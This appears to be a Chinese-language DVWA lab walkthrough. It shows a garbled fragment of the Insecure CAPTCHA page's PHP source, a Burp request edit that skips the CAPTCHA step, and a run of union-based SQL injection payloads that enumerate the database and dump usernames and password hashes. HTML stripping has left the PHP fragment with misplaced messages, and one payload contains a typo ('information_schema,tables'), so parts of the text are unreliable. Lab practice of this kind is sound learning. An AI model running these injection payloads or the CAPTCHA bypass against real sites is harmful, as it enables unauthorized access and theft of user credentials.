查看源码
"; $hide_form = false; return; } else { // CAPTCHA was correct. Do both new passwords match? if( $pass_new == $pass_conf ) { // Show next stage for the user echo "
The CAPTCHA was incorrect. Please try again.
"; } else { // Both new passwords do not match. $html .= "
You passed the CAPTCHA! Click the button to confirm your changes.
Both passwords must match."; $hide_form = false; } } } //第二阶段,检测两次密码是否一致,并更新密码 if( isset( $_POST[ 'Change' ] ) && ( $_POST[ 'step' ] == '2' ) ) { // Hide the CAPTCHA form $hide_form = true; // Get input $pass_new = $_POST[ 'password_new' ]; $pass_conf = $_POST[ 'password_conf' ]; // Check to see if both password match if( $pass_new == $pass_conf ) { // They do! $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : "")); $pass_new = md5( $pass_new ); // Update database $insert = "UPDATE `users` SET password = '$pass_new' WHERe user = '" . dvwaCurrentUser() . "';"; $result = mysqli_query($GLOBALS["___mysqli_ston"], $insert ) or die( '
' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '' ); // Feedback for the end user echo "
Password Changed."; } else { // Issue with the passwords matching echo "
Passwords did not match."; $hide_form = false; } ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res); } ?>
分为两步:
step1,对用户的身份进行验证,验证成功才能进行密码修改;
step2,两次输入的密码一致,才可以进行修改。
用burp抓包
将step=1改为step=2即可 。
SQL 注入输入1
输入1 and 1=2
输入1' and 1=2
可判断id含有单引号。
分别输入1' order by 2#,1' order by 3#。
当输入1' order by 3#时出错
则字段为2
使用联合查询1' union select 1,2#查看回显
查看数据库名 1' union select 1,database()#
查看表名 1' union select 1, group_concat(table_name) from information_schema,tables where table_schema=database()#
查看字段 1 ' union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users' #
查看数据 1 ' union select group_concat(user),group_concat(password) from users #
